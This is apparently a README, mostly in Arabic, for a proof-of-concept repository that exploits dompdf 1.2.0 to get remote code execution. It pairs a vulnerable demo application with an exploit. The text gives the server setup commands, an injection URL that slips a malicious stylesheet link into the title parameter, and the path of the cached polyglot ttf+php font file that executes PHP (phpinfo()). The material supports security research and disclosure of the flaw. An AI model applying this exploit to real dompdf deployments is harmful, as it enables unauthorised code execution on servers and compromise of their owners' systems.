
RCE exploit for dompdf
يحتوي هذا المستودع على تطبيق تجريبي قابل للاستغلال يستخدم dompdf 1.2.0 واستغلالًا يحقق تنفيذ الأوامر عن بُعد عبر ملف متعدد اللغات ttf+php.

لمزيد من التفاصيل، يرجى زيارة https://positive.security/blog/dompdf-rce
$ cd application
$ php -S localhost:9000
$ cd exploit
$ php -S localhost:9001
http://localhost:9000/index.php?pdf&title=<link rel=stylesheet href='http://localhost:9001/exploit.css'>
phpinfo()http://localhost:9000/dompdf/lib/fonts/exploitfont_normal_3f83639933428d70e74a061f39009622.php
يرجى ملاحظة: إذا كنت تستخدم نطاقات أو منافذ مختلفة، فيرجى تعديل exploit/exploit.css وفقًا لذلك والتحقق من application/dompdf/lib/fonts للحصول على اسم ملف الخط الكامل.